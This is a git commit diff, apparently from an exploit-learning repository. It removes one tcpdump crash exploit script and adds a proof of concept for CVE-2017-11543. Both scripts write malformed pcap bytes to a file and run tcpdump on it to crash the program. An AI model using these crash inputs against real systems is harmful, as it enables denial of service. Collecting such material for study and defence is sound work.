finish 7.1.1

2025-06-24 04:05:03 +07:00 · 2017-12-13 15:23:04 +08:00
parent c76dc1224c
commit 9bdcfab6e9
9 changed files with 604 additions and 62 deletions
--- a/src/exploit/7.1.1_dos_tcpdump_crash/exp.py
+++ b/src/exploit/7.1.1_dos_tcpdump_crash/exp.py
@ -1,41 +0,0 @@
-# Exploit Title: tcpdump 4.5.1 Access Violation Crash
-# Date: 31st May 2016
-# Exploit Author: David Silveiro
-# Vendor Homepage: http://www.tcpdump.org
-# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
-# Version: 4.5.1
-# Tested on: Ubuntu 14 LTS
-
-from subprocess import call
-from shlex import split
-from time import sleep
-
-def crash():
-    command = 'tcpdump -r crash'
-
-    buffer     =   '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
-    buffer     +=  '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
-    buffer     +=  '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
-    buffer     +=  '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
-    buffer     +=  "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
-    buffer     +=  "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
-    buffer     +=  '\x00\x00\x00\x00\x01\x03\x03\x04'
-
-    with open('crash', 'w+b') as file:
-        file.write(buffer)
-
-    try:
-        call(split(command))
-        print("Exploit successful!             ")
-    except:
-        print("Error: Something has gone wrong!")
-
-def main():
-    print("Author:   David Silveiro                           ")
-    print("   tcpdump version 4.5.1 Access Violation Crash    ")
-
-    sleep(2)
-    crash() 
-
-if __name__ == "__main__":
-    main()
--- a/src/exploit/7.1.1_tcpdump_2017-11543/poc.py
+++ b/src/exploit/7.1.1_tcpdump_2017-11543/poc.py
@ -0,0 +1,18 @@
+import os
+
+def sigsegv():
+    buf  = "\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    buf += "\x00\x00\x04\x00\x08\x00\x00\x00\xf6\xb5\xa5X\xf8\xbd\x07\x00'"
+    buf += "\x00\x00\x006\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7"
+    buf += "\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xe7\xca\x00"
+    buf += "\x00RT\x00\x125\x02\x08\x00'\xbd\xc8.\x08\x00"
+
+    with open("slip-bad-direction.pcap", "wb") as f:
+        f.write(buf)
+        f.close()
+
+    cmd = 'tcpdump -e -r slip-bad-direction.pcap'
+    os.system(cmd)
+
+if __name__ == "__main__":
+    sigsegv()
--- a/src/exploit/7.1.1_tcpdump_2017-11543/slip-bad-direction.pcap
+++ b/src/exploit/7.1.1_tcpdump_2017-11543/slip-bad-direction.pcap